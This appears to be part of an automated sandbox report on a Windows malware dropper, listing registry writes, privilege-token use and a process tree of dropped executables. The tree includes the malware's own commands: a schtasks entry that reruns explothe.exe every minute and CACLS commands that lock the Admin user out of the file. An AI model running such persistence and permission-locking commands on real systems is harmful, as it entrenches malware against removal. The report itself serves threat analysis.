| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe
"C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1844 -ip 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 196
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6DA5dP6.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6DA5dP6.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1DA5.tmp\1DB5.tmp\1DB6.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x148,0x174,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16123523405751983624,8471195437817248918,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2492 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11715136987403279359,8478760683434930365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16123523405751983624,8471195437817248918,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11715136987403279359,8478760683434930365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\45FE.exe
C:\Users\Admin\AppData\Local\Temp\45FE.exe
